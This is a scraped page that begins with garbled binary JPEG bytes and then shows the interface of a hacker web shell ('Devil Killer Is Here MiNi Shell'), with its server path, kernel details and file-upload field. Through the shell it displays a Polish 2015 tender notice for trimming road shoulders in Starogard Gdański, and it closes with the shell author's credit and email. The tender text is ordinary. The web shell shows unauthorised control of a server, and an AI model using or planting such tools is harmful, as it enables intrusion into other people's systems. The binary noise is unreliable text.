JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150126/17378-N-2015.html

<p class="kh_header"><b>Starogard Gdański: Mechaniczne ścinanie zawyżonych poboczy gruntowych dróg powiatowych w PZD Starogard Gdański w roku 2015.</b><br>
<b>Numer ogłoszenia: 17378 - 2015; data zamieszczenia: 26.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg , ul. Mickiewicza 9, 83-200 Starogard Gdański, woj. pomorskie, tel. (058) 562-34-61, faks (058) 562-34-62.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdstg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Mechaniczne ścinanie zawyżonych poboczy gruntowych dróg powiatowych w PZD Starogard Gdański w roku 2015..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszej szczegółowej specyfikacji technicznej (SST) są wymagania dotyczące wykonania i odbioru robót związanych ze ścinaniem - regulacją zawyżonych poboczy gruntowych.
1.2.Zakres stosowania SST
Szczegółowa specyfikacja techniczna (SST) stanowi dokument przetargowy i kontraktowy przy zlecaniu i realizacji robót na drogach powiatowych - teren działania PZD Starogard Gdański.
1.3.Zakres robót objętych SST
Ustalenia zawarte w niniejszej specyfikacji dotyczą zasad prowadzenia robót związanych ze ścinaniem  - regulacją zawyżonych poboczy gruntowych wraz z odwozem gruntu w miejsce odkładu, w ciągu dróg powiatowych wg nr administrowanych przez Powiatowy Zarząd Dróg w Starogardzie Gdańskim:
Lp.	Droga	Lokalizacja odcinka Powierzchnia m2 
1.	nr 2733G	Lubichowo - Ocypel	25 480 m2
2.	nr 2721G	Odc. Bietowo - Szteklin	8 000 m2
3.	nr 2712G	Koteże - Sumin	5 600 m2
4.	nr 2718G	DK22-Rywałd-Klonówka-Gr. Powiatu.	21 210 m2
5.	nr 2717G	Rywałd - Brzeźno	6 180 m2
6.	nr 2710G	Klonówka-Kolincz-Dr. Owidzka	13 380 m2
7.	nr 2702G	Pinczyn (przepust)-Piesienica	9 150 m2
8.	nr 2703G	DK22 - Karolewo - Skarszewy	37 800 m2
9.	nr 2720G	Osiek - Wierzbiny	16 284 m2
10.	nr 2731G	Błędno-Gr. Woj. od skrzyż. z 2726G do mostu	6 600 m2
11.	nr 2732G	Ocypel-L. Baby od torów kolej.  w Ocyplu do skrzyż. z dr. 2704G L. Baby	6 240 m2
12. nr 2739G	Barłożno-granica pow.(Kierwałd)
od tablic. m. Barłożno do gr. pow.	5 491 m2
13.	nr 2724G	Byłyczek - D. Krówno	2 700 m2
14.	nr 2724G	D. Krówno - Osieczna	4 650 m2
15.	nr 2730G	Kopytkowo - Bobrowiec (droga gruntowa)	9 600 m2
Razem: 178 365 m2
w poboczu  występuje  zadrzewienie;
średnia grubość  ścinki  15 -25 cm;
wywóz odkładu - w gestii  Wykonawcy 
Należy wykonać uzupełnienia materiałem rodzimym na każdym odcinku wykonywanej ścinki, tam gdzie sytuacja tego wymaga.
Zakładane w  pkt 1.3. ilości robót określone szczegółowo w tabeli mogą ulec zmniejszeniu lub zwiększeniu. 
1.4.	Określenia podstawowe
1.4.1	Pobocze gruntowe - część korony drogi przeznaczona do chwilowego zatrzymania się pojazdów, umieszczenia urządzeń bezpieczeństwa ruchu i wykorzystywana do ruchu pieszych, służąca jednocześnie do bocznego oparcia konstrukcji nawierzchni i odprowadzenia wód opadowych  z jezdni do rowu.
1.4.2	Odkład - miejsce składowania gruntu pozyskanego w czasie ścinania poboczy.
1.4.3	Dokop - miejsce pozyskania gruntu do wykonania uzupełnienia poboczy położone poza pasem drogowym.
1.4.4	Pozostałe określenia podstawowe są zgodne z obowiązującymi, odpowiednimi polskimi normami  i z definicjami podanymi w  D-00.00.00 Wymagania ogólne 
1.5.	Ogólne wymagania dotyczące robót
	Ogólne wymagania dotyczące robót podano w SST D-00.00.00 Wymagania ogólne pkt 1.5.
2.	MATERIAŁY
2.1.	Ogólne wymagania dotyczące materiałów
Ogólne wymagania dotyczące sprzętu podano w SST D-00.00.00 Wymagania ogólne pkt 2.
2.2.Wymagania dotyczące materiałów do uzupełnienia poboczy
Przewiduje się częściowe uzupełnianie poboczy materiałem rodzimym, na odcinkach gdzie po prowadzonej ścince będą miejsca zaniżone. W tym celu należy wykorzystać w maksymalnym stopniu rodzimy grunt zalegający w podłożu ściętego pobocza. Zakłada się, że uzupełnieniu podlegać będzie do 10 % powierzchni ilości m2 ścinania. 
3.	SPRZĘT
3.1.	 Ogólne wymagania dotyczące sprzętu 
Ogólne wymagania dotyczące sprzętu podano w SST D-00.00.00 Wymagania ogólne pkt 3
3.2.	Sprzęt do ścinania poboczy
	Wykonawca przystępujący do wykonania robót określonych w niniejszej SST  powinien wykazać się możliwością korzystania z samobieżnych frezarek/ ścinarek do ścinki poboczy. 
4.TRANSPORT
4.1.Ogólne wymagania dotyczące transportu
Ogólne wymagania dotyczące transportu podano w SST D-00.00.00 Wymagania ogólne pkt 4.
4.2.	Transport materiałów
	Przy wykonywaniu robót określonych w niniejszej SST, można korzystać z dowolnych środków transportowych skrzyniowych - samowyładowczych. przeznaczonych do przewozu gruntu w ilości i ładowności zapewniającej ciągłość pracy.
5.	WYKONANIE ROBÓT
5.1.	Ogólne zasady wykonania robót
	Ogólne zasady wykonania robót podano w SST D-00.00.00 Wymagania ogólne pkt 5.
5.2.	Ścinanie poboczy
Ścinanie poboczy należy wykonywać samobieżnym sprzętem mechanicznym wg pkt 3.2.
Ścinanie poboczy należy przeprowadzić od krawędzi pobocza do krawędzi nawierzchni, zgodnie ze spadkiem poprzecznym 6% 8%.
Ścinkę poboczy należy wykonać na odcinkach wskazanych przez Zamawiającego, na średniej szerokości 1,5 m, przy średniej grubości ścinania  20 cm. Szerokości i długości ścinania dla poszczególnych odcinków dróg podano szczegółowo w tabeli w pkt 1.3. zakres robót
Część nadmiaru gruntu uzyskanego podczas ścinania poboczy będzie wykorzystana do ich uzupełnienia, pozostałą część należy wywieźć na odkład na średnią odległość do 5 km. Miejsce odkładu należy uzgodnić   z Zamawiającym. 	
5.3.	Uzupełnianie poboczy
W przypadku występowania ubytków wgłębień i zaniżenia w poboczach należy je uzupełnić materiałem rodzimym lub o właściwościach podobnych do materiału, z którego zostały pobocza wykonane.
Miejsce, w którym wykonywane będzie uzupełnienie, należy spulchnić na głębokość od 2 do 3 cm, doprowadzić do wilgotności optymalnej, a następnie ułożyć w nim warstwę materiału uzupełniającego.
Zagęszczenie ułożonej warstwy materiału uzupełniającego należy prowadzić od krawędzi poboczy   w kierunku krawędzi nawierzchni. Rodzaj sprzętu do zagęszczania musi być zaakceptowany przez Zamawiającego. Zagęszczona powierzchnia powinna być równa, posiadać spadek poprzeczny zgodny  z założonym, oraz nie posiadać śladów po przejściu zagęszczarek.
6.	KONTROLA JAKOŚCI ROBÓT
6.1.	Ogólne zasady kontroli jakości robót
	Ogólne zasady kontroli jakości robót podano w SST D-00.00.00 Wymagania ogólne pkt 6.
6.2.	Pomiar cech geometrycznych ścinanych poboczy
Tablica 1. Częstotliwość oraz zakres pomiarów ścinanych lub uzupełnianych poboczy
 Lp.	Wyszczególnienie	Minimalna częstotliwość pomiarów
1	Szerokość ściętego pobocza	co 50 m
2	Spadki poprzeczne	2 razy na 100 m
3	Równość podłużna	co 50 m
4	Równość poprzeczna	

6.3.1. Spadki poprzeczne poboczy
	Spadki poprzeczne poboczy powinny być zgodne z założonymi, z tolerancją 1%.
	od 6% ÷ 8% na odcinku prostym,
	2% do 3% więcej niż pochylenie jezdni, jeżeli jest to pobocze po wewnętrznej stronie łuku: 
tyle co pochylenie jezdni - do szerokości 1,0 m pobocza, a na pozostałej części pobocza 2% w kierunku przeciwnym, jeżeli jest to pobocze po zewnętrznej stronie łuku.
6.3.2. Równość poboczy
	Nierówności podłużne i poprzeczne należy mierzyć łatą 4-metrową wg BN-68/8931-04 2. Maksymalny prześwit pod łatą nie może przekraczać 15 mm.
7.	 OBMIAR ROBÓT
7.1.	Ogólne zasady obmiaru robót
	Ogólne zasady obmiaru robót podano w SST D-00.00.00 Wymagania ogólne pkt 7.
7.2.	Jednostka obmiarowa
	Jednostką obmiarową jest m2 wykonanych robót na poboczach. 
8.	 ODBIÓR ROBÓT
Ogólne zasady odbioru robót podano w SST D-00.00.00 Wymagania ogólne pkt 8.
Roboty uznaje się za wykonane zgodnie z dokumentacją  przetargową , SST  i 
wymaganiami Zamawiającego, jeżeli wszystkie pomiary i badania z zachowaniem tolerancji wg pkt 6 dały wyniki pozytywne.
9.	 PODSTAWA PŁATNOŚCI
9.1.	Ogólne ustalenia dotyczące podstawy płatności
Ogólne ustalenia dotyczące podstawy płatności podano w SST D-00.00.00 Wymagania ogólne pkt 9
9.2.	Cena jednostki obmiarowej
Cena wykonania 1 m2 robót obejmuje:
prace pomiarowe i przygotowawcze,
robociznę bezpośrednią wraz z kosztami towarzyszącymi
oznakowanie robót,
ścięcie poboczy i zagęszczenie podłoża,
odwiezienie gruntu na odkład,	dostarczenie materiału uzupełniającego,
uzupełnienie materiałem rodzimym,
zagęszczenie poboczy,
przeprowadzenie pomiarów wymaganych w specyfikacji technicznej,
10.	 PRZEPISY ZWIĄZANE
10.1.	Normy
1.	PN-B-04481	Grunty budowlane. Badania laboratoryjne
2.	BN-68/8931-04   Drogi samochodowe. Pomiar równości nawierzchni planografem i łatą
3.	BN-77/8931-12   Oznaczenie wskaźnika zagęszczenia gruntu.
3.1.	Inne materiały
1.  Stanisław Datka, Stanisław Luszawski: Drogowe roboty ziemne..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających zgodnie z art. 67  ust. 1 pkt 6 ustawy Pzp do wysokości 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 84.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 6 000,00 zł.
(słownie złotych: sześć tysięcy 00/100).
Wadium musi być wniesione na koncie bankowym Zamawiającego przed upływem terminu składania ofert w następujących formach, w zależności od wyboru Wykonawcy:
a)	pieniądzu, przelewem na rachunek bankowy: 
w Banku Spółdzielczym o/ Starogard Gdański
nr 94 8340 0001 0005 5420 2000 0004
b)	poręczeniach bankowych;
c)	poręczeniach pieniężnych spółdzielczych kas oszczędnościowo-kredytowych;
d)	gwarancjach bankowych;
e)	gwarancjach ubezpieczeniowych;
f)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
Wadium musi obejmować cały okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy niepodlegający wykluczeniu  z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp   i spełniający warunki, o których mowa w art. 22 ust.1 ustawy Pzp,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty co najmniej 1 zamówienie odpowiadające swoim rodzajem i zakresem tzn. Mechaniczne ścinanie zawyżonych poboczy gruntowych dróg.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie w celu realizacji zamówienia narzędziami, wyposażeniem zakładu i urządzeniami wymienionymi w poniższej tabeli:
Wyszczególnienie	Min. liczba jednostek  sprzęt. / transp.	
1.	Frezarka/ ścinarka samobieżna do ścinki mechanicznej poboczy	2 szt. 	
2.	Samochody ciężarowe - skrzyniowe samowyładowcze 	4 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie osobami, które będą  uczestniczyć           w realizacji zamówienia, legitymującymi się doświadczeniem i kwalifikacjami zawodowymi określonymi w poniżej:
1.	Kierownik budowy - robót	min 1 rok praktyki zawodowej jako kierownik podobnych robót, legitymujący się uprawnieniami budowlanymi do kierowania robotami w specjalności drogowej lub równoważne oraz przynależność do Polskiej Izby Inżynierów Budownictwa.
2.Operator frezarki/ ścinarki	osoba legitymująca się uprawnieniami maszynisty ciężkich maszyn budowlanych i drogowych w zakresie obsługi samobieżnej frezarki/ścinarki poboczy.  Liczba operatorów uzależniona jest od ilości maszyn użytych do realizacji zamówienia (min.2 osoby)
3.Osoby do kierowania ruchem 4 osoby legitymujące się uprawnieniami do kierowania ruchem drogowym</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełnienia warunku  i za spełnienie tego warunku uzna złożenie oświadczenia, o którym mowa w pkt. 7.2.1 niniejszej Instrukcji dla Wykonawców</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin realizacji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku ustawowej zmiany procentowej stawki podatku VAT, kwota brutto wynagrodzenia zostanie odpowiednio dostosowana aneksem do niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdstg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg, ul. Mickiewicza 9,  83-200 Starogard Gd..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2015 godzina 08:00, miejsce: Powiatowy Zarząd Dróg, ul. Mickiewicza 9,  83-200 Starogard Gd., pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com